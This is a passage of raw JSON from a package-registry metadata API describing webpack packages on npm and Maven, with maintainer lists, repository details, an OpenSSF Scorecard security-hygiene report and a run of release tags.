itHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":411,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ddder%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ddder%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ddder%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ddder%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ddder%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ddder%2Fwebpack/codemeta","maintainers":[{"uuid":"samhwang1990","login":"samhwang1990","name":null,"email":"samhwang1990@gmail.com","url":null,"packages_count":19,"html_url":"https://www.npmjs.com/~samhwang1990","role":null,"created_at":"2022-11-16T16:34:17.111Z","updated_at":"2022-11-16T16:34:17.111Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/samhwang1990/packages"},{"uuid":"waltcow","login":"waltcow","name":null,"email":"waltcow@gmail.com","url":null,"packages_count":43,"html_url":"https://www.npmjs.com/~waltcow","role":null,"created_at":"2022-11-16T16:34:17.098Z","updated_at":"2022-11-16T16:34:17.098Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/waltcow/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11663458,"name":"org.mvnpm:webpack","ecosystem":"maven","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"org.mvnpm","versions_count":48,"first_release_published_at":"2025-03-19T05:10:48.000Z","latest_release_published_at":"2026-09-01T02:22:19.000Z","latest_release_number":"5.110.2","last_synced_at":"2026-09-03T00:15:25.065Z","created_at":"2025-05-20T12:30:55.226Z","updated_at":"2026-09-03T00:15:25.065Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm/webpack/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm/webpack/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/